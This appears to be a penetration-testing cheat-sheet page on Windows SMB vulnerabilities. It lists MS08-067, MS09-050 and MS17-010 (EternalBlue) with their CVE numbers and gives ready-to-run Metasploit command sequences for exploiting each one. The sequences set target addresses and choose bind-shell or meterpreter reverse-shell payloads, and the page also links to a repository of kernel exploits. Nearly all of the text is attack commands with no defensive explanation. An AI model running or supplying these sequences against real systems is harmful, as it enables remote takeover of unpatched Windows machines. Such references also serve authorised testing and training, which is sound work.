SMB Vulnerabilities

Common smb vulns

MS08-067

CVE-2008-4250

Metasploit:

msf > search ms08_067 
msf > use exploit/windows/smb/ms08_067_netapi 
msf  exploit(ms08_067_netapi) > set RHOST 192.168.229.137 
msf  exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp 
msf  exploit(ms08_067_netapi) > exploit

MS09-050

CVE-2009-2526

Metasploit:

msf > search MS09_050 
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index  
msf exploit(ms09_050_smb2_negotiate_func_index) > options 
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp 
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102 
msf exploit(ms09_050_smb2_negotiate_func_index) > run

Exploits:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS09-050

MS17-010

CVE-2017-0143

Metasploit:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13 
msf exploit(ms17_010_eternalblue) > run

PreviousCompiling Code NextKerberos Attacks

Last updated 4 years ago